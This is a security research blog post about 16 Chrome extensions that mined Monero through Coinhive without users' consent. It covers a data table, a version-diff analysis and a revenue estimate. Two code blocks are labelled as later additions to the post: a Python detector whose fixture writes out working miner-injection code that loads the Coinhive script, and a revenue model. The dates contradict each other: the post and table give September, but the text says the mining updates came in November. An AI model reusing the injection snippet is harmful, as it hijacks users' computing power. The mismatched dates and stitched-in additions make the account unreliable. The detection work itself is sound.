Posted on by Achim D. Brucker, licensed under CC BY-ND 4.0.

It's More Than One - Monero Mining Chrome Extensions

In the last few days, a researcher discovered that the SafeBrowse Chrome extension uses the computers of its users to mine Monero (an alternative crypto currency similar to Bitcoin). With over 140000 users, this is most likely the most popular (and probably the first) Chrome extension mining a crypto currency without users’ consent. It is not the only one …

The Details

As of today (23rd of September 2017), there are at least 16 other extensions that apply the same technique without informing their users (we also found two extensions that use the same technique to raise money for charities):

Id   Users  Available  First Mining  Last Update  Category        Author  Wallet
jjc  21109  02-01      09-20         09-21        Shopping        A       u19
gmc  14125  02-01      09-19         09-21        Productivity    B       BPZ
nnj   7591  02-01      09-20         09-20        Fun             C       m3a
ajo   4346  05-20      09-20         09-19        Soc. & Com.     D       zzF
beh   3939  04-01      09-19         09-19        Soc. & Com.     E       7Jj
ahb   1782  04-26      09-19         09-19        Soc. & Com.     G       YdH
kdp    941  02-23      09-20         09-20        Soc. & Com.     H       Esa
oem    783  02-01      09-20         09-20        Prod.           D       m3a
lem    348  02-01      09-20         09-20        Shopping        I       yRG
iln    226  02-01      09-20         09-20        Dev. Tools      J       FrY
edk    157  04-24      09-19         09-19        Prod.           K       4pH
kil    136  02-01      09-21         09-21        Prod.           L       4Qh
eki     28  04-24      09-19         09-19        Fun             K       4pH
ioh     19  07-12      09-19         09-20        News & Weather  M       UJ6
nnh      4  08-05      09-19         09-19        Shopping        I       yRG
mng      0  09-20      09-20         09-20        Dev. Tools      O       HZI

In this table, we pseudonymized the extension id (first column), the author (seventh column), and the Monero wallet (last column). Moreover, we report the number of users (second column), the date on which we first detected the extension as part of our research (third column), the first date (month and day, e.g., 02-01 is 2nd of February) on which we detected Monero mining code in the extension (fourth column), the date of the last update (fifth column), and the extension category (sixth column).

Before we dig into the details, let’s be clear: these are all extensions with a comparatively small user base: in total they have fewer than 56000 users (roughly 40% of the user base of SafeBrowse). Still, analyzing these extensions, as well as SafeBrowse, reveals some interesting insights:

As part of our security research on browser extensions, we monitor extensions at least once every 24 hours. Thus, we have data that gives more insight into the SafeBrowse incident, and we are able to easily check other extensions in the Chrome store.

  • First, let’s have a look at the data on SafeBrowse:

    • SafeBrowse is a well established and long maintained extension (it has been available since we started to monitor regularly in February 2017)

    • The last time we saw a non-malicious version of SafeBrowse was on November 19th at 5.30 am. Already on November 20th at 2.51 (i.e., 21 hours later), the extension was removed from the Chrome store. Thus, the whole chain of events, from uploading a malicious new version, to somebody reporting it to Google, to Google removing the extension from the Chrome store, happened in less than 21 hours.

  • After the publication of the SafeBrowse incident, we checked the other extensions in the store. In total, we found 16 extensions that mine crypto currencies without user consent. The extensions have between 0 and 21109 users and are offered by various authors in various categories:

    • All extensions received an update containing the mining code between November 19th and November 21st and, except for two, all of them were available (without the mining code) for several months prior to the first update containing mining code.

    • While all extensions use the same implementation of the actual mining algorithm offered by Coinhive, we found three different ways of embedding it (code smells): 14 of the 16 extensions use the same client-side mining configuration (except for the actual wallet), whereas two extensions (ajo and jjc) each use a different variant.

    • Three extensions (gmc, ioh, and jjc) received updates after the mining code was injected for the first time. In these cases, we compared the last non-mining version, the first version containing the mining code, and the updated version containing the mining code:

      • In all cases, the update containing the mining code did not change any feature (nor did it introduce new features). Thus, the only purpose of these updates is the introduction of the mining code. There is one somewhat funny exception, though, where messages were also translated from German to English. In several cases, inserting the mining code also required changing the permissions of the extension.

      • The updates after the first introduction of the mining code modified the mining configuration, i.e., reduced the mining speed and, thus, reduced the risk of users complaining about their devices slowing down.

    • While we have no hints that the extensions were modified by their original authors (actually, it seems more likely that the developers’ accounts were misused by third parties), it is conspicuous that extensions by the same author use the same Monero wallet while extensions offered by different authors use different wallets.

    • At least one extension is Open Source, i.e., the original author published the source code on GitHub: the GitHub repository does not contain the mining code. This could be further evidence that the malicious updates were not published by the original authors.
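The comparison described in the bullets above (last non-mining version versus the first mining version versus a later reconfigured version) can be automated. The following is an added example, not code from the post or from the authors' monitoring infrastructure: it diffs two snapshots of an extension and flags added manifest permissions, newly introduced references to an in-browser miner library, and changes to the miner's throttle setting. The indicator strings (the coinhive.com domain and the CoinHive.Anonymous constructor) are assumed from Coinhive's public JavaScript API of 2017 rather than taken from the post, and all three snapshots are constructed sample data with a placeholder instead of a wallet key.

```python
"""Differential check of two Chrome extension snapshots (added example).

Flags (1) added manifest permissions, (2) newly introduced miner
indicators and (3) a changed miner throttle between two versions.
Indicator strings are assumed from Coinhive's public API, not from the
post; the snapshots at the bottom are constructed sample data.
"""
import json
import re
from typing import Dict, List, Optional

# Indicators of the Coinhive miner library (assumed from its public API).
MINER_INDICATORS = ("coinhive.com", "CoinHive.Anonymous")

# Matches `throttle: 0.3` inside a miner configuration object.
# In Coinhive's API a higher throttle value means a *slower* miner.
THROTTLE_RE = re.compile(r"throttle\s*:\s*([0-9]*\.?[0-9]+)")


def find_miner_indicators(files: Dict[str, str]) -> List[str]:
    """Return 'file:indicator' for every miner indicator in JS/HTML files."""
    hits = []
    for name, content in sorted(files.items()):
        if name.endswith((".js", ".html")):
            hits.extend(f"{name}:{ind}" for ind in MINER_INDICATORS if ind in content)
    return hits


def find_throttle(files: Dict[str, str]) -> Optional[float]:
    """Return the first throttle value found in any script, or None."""
    for name, content in sorted(files.items()):
        if name.endswith(".js"):
            m = THROTTLE_RE.search(content)
            if m:
                return float(m.group(1))
    return None


def diff_versions(old: Dict[str, str], new: Dict[str, str]) -> dict:
    """Compare two snapshots; each maps a file name to its content."""
    old_manifest = json.loads(old["manifest.json"])
    new_manifest = json.loads(new["manifest.json"])
    return {
        "versions": (old_manifest.get("version"), new_manifest.get("version")),
        "added_permissions": sorted(
            set(new_manifest.get("permissions", [])) - set(old_manifest.get("permissions", []))
        ),
        "new_miner_indicators": sorted(
            set(find_miner_indicators(new)) - set(find_miner_indicators(old))
        ),
        "throttle": (find_throttle(old), find_throttle(new)),
    }


def classify(report: dict) -> str:
    """Label a diff report the way the post groups the observed updates."""
    if report["new_miner_indicators"]:
        return "miner-introduced"
    old_t, new_t = report["throttle"]
    if old_t is not None and new_t is not None and old_t != new_t:
        return "miner-reconfigured"
    return "no-miner-change"


def _manifest(version: str, permissions: List[str]) -> str:
    # Constructed manifest; "Example Shopping Helper" is not a real extension.
    return json.dumps({
        "name": "Example Shopping Helper",
        "version": version,
        "permissions": permissions,
        "background": {"scripts": ["background.js"]},
    })


FEATURE_CODE = "chrome.storage.local.get('prefs', function (p) { /* feature code */ });\n"
MINER_CODE = (  # constructed fixture; WALLET_PLACEHOLDER stands in for a site key
    "var s = document.createElement('script');\n"
    "s.src = 'https://coinhive.com/lib/coinhive.min.js';\n"
    "document.head.appendChild(s);\n"
    "var miner = new CoinHive.Anonymous('WALLET_PLACEHOLDER', { throttle: %s });\n"
    "miner.start();\n"
)

# Constructed snapshots: clean, miner added (plus new permissions), miner slowed down.
V1 = {"manifest.json": _manifest("1.4.0", ["storage"]), "background.js": FEATURE_CODE}
V2 = {"manifest.json": _manifest("1.4.1", ["storage", "tabs", "<all_urls>"]),
      "background.js": FEATURE_CODE + MINER_CODE % "0.3"}
V3 = {"manifest.json": _manifest("1.4.2", ["storage", "tabs", "<all_urls>"]),
      "background.js": FEATURE_CODE + MINER_CODE % "0.8"}


def run_demo() -> List[str]:
    """Classify consecutive snapshot pairs; returns the labels in order."""
    labels = []
    for old, new in ((V1, V2), (V2, V3)):
        report = diff_versions(old, new)
        labels.append(classify(report))
        print(report["versions"], labels[-1], report)
    return labels


if __name__ == "__main__":
    run_demo()
```

Run against the constructed snapshots, the V1 to V2 step is labelled as introducing the miner (with `tabs` and `<all_urls>` as added permissions, matching the permission changes noted above), and the V2 to V3 step as a reconfiguration that only raises the throttle. Against real extension archives one would feed the unpacked files of two consecutive store versions into `diff_versions`.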

We also found two extensions that mine Monero on purpose, to support charities. This allows users to donate “while browsing the web”. This is, of course, a legitimate use. Interestingly, they use the same mining code as the questionable extensions discussed in the previous section. These two legitimate extensions were published on September 18th and September 22nd, respectively. While the one published on September 22nd was most likely inspired by the press coverage of the SafeBrowse incident, we cannot answer the question whether the legitimate one published on September 18th inspired the misuse of SafeBrowse or not.

How Much Can Be Earned By Mining?

Of course, the final question to answer is “how much money can be made?” This question is not easy to answer. The people at Coinhive claim that “with just 10–20 active miners on your site, you can expect a monthly revenue of about 0.3 XMR (~$27)”. Let’s assume this means 20 active miners for 24 hours a day, every day of the month. As the extensions mine whenever Chrome is showing a website, we can use the average time people spend on the Internet for our further analysis: let’s be optimistic and assume that each user of an extension mines for 120 hours a month (according to The Telegraph, teenagers use the Internet for more than 27 hours a week). This results in a revenue of ~$22000 for an extension with 100000 users. As the extensions need to mine in the background using as few resources as possible, the actual mining rate of these extensions is usually much lower, and a more realistic revenue might be in the area of a few thousand dollars. Still, if Google detects the misuse within less than 21 hours, the possible gains are negligible.
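The estimate above, carried through as a small model so the assumptions can be varied; this is an added example, not a calculation from the post. The baseline is the Coinhive claim quoted in the text (20 miners around the clock yielding ~$27 a month); the per-user hours and the throttling factor are parameters, and the takedown function adds the assumption (ours, not the post's) that users are online a constant fraction of the time.

```python
# Added example: the post's back-of-the-envelope revenue estimate as a model.
BASELINE_MINERS = 20            # "10-20 active miners": take the upper bound
BASELINE_USD_PER_MONTH = 27.0   # ~0.3 XMR per month, quoted as ~$27
HOURS_PER_MONTH = 24 * 30       # the claim is read as mining around the clock


def usd_per_miner_hour() -> float:
    """Revenue of one full-speed miner per hour, derived from the baseline."""
    return BASELINE_USD_PER_MONTH / (BASELINE_MINERS * HOURS_PER_MONTH)


def monthly_revenue_usd(users: int, hours_per_user: float, speed: float = 1.0) -> float:
    """Monthly revenue for `users` users, each mining `hours_per_user` hours.

    `speed` scales the hash rate relative to the baseline (1.0 = full speed);
    a background miner throttled to 10% of full speed would use speed=0.1.
    """
    return users * hours_per_user * speed * usd_per_miner_hour()


def revenue_until_takedown(users: int, hours_per_user: float,
                           hours_until_removal: float, speed: float = 1.0) -> float:
    """Revenue earned before the extension is removed from the store.

    Assumption of this example: users are online a constant fraction of the
    time, namely hours_per_user / HOURS_PER_MONTH.
    """
    online_fraction = hours_per_user / HOURS_PER_MONTH
    return users * online_fraction * hours_until_removal * speed * usd_per_miner_hour()


if __name__ == "__main__":
    print(f"{monthly_revenue_usd(100000, 120):.0f} USD/month at full speed")
    print(f"{monthly_revenue_usd(100000, 120, speed=0.1):.0f} USD/month at 10% speed")
    print(f"{revenue_until_takedown(140000, 120, 21):.0f} USD before a 21 h takedown")
```

With the post's numbers (100000 users, 120 hours each) the full-speed figure is $22500, i.e. the ~$22000 quoted above; at a tenth of the speed it drops to $2250, the "few thousand dollars" range. For 140000 users online a sixth of the time and a takedown after 21 hours, the model yields under $1000, which is the "negligible" case.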

Conclusions

The most important takeaway is that the reporting mechanism for malicious extensions seems to work rather quickly for widely used (more than 100k users) extensions. Still, for extensions with a smaller user base, it is less likely that severe changes in the intention of the extension (e.g., after being hijacked) are detected quickly. Moreover, even after an extension has been banned from the store, new updates misusing the same approach can still be published in the Chrome store.

Finally, extensions are not only a juicy target for attackers who want to earn money by mining crypto currencies; they are also a gateway for attacks on the security and privacy of browser users. Thus, to minimize the attack surface, we recommend installing as few extensions as possible and using the temporary profile feature of Chrome for testing. Of course, this does not help if a benign extension is hijacked and misused, as seems to be the case for the extensions discussed in this blog post. Here the situation is much more complex, and we will discuss it in future articles.